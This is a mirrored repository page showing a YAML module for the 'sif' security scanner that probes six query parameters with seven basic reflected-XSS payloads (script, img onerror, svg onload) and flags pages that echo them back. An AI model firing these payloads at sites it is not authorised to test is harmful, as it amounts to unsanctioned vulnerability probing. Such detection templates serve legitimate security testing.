gitea-mirror/sif
1
0
Fork 0
mirror of https://github.com/lunchcat/sif.git synced 2026-01-13 05:16:44 -08:00
Code Issues Packages Projects Releases Wiki Activity
Files
d9dd3dc40cdaaec9c7b966e0ae6afca00b2d4e5d
sif/modules/http/xss-reflected.yaml
Celeste Hickenlooper aac5d48cbd feat: add built-in yaml modules for security scanning
2026-01-03 05:57:10 -08:00

42 lines
1010 B
YAML
Raw Blame History

# Reflected XSS Detection Module
id: xss-reflected
info:
name: Reflected XSS Detection
author: sif
severity: medium
description: Detects reflected Cross-Site Scripting vulnerabilities
tags: [xss, injection, javascript, owasp-top10]
type: http
http:
method: GET
paths:
- "{{BaseURL}}/?q={{payload}}"
- "{{BaseURL}}/?search={{payload}}"
- "{{BaseURL}}/?name={{payload}}"
- "{{BaseURL}}/?input={{payload}}"
- "{{BaseURL}}/?message={{payload}}"
- "{{BaseURL}}/?text={{payload}}"
payloads:
- "<script>alert('XSS')</script>"
- "'><script>alert('XSS')</script>"
- "\"><script>alert('XSS')</script>"
- "<img src=x onerror=alert('XSS')>"
- "<svg onload=alert('XSS')>"
- "javascript:alert('XSS')"
- "<body onload=alert('XSS')>"
threads: 10
matchers:
- type: word
part: body
words:
- "<script>alert('XSS')</script>"
- "<img src=x onerror=alert('XSS')>"
- "<svg onload=alert('XSS')>"
condition: or
Reference in New Issue View Git Blame Copy Permalink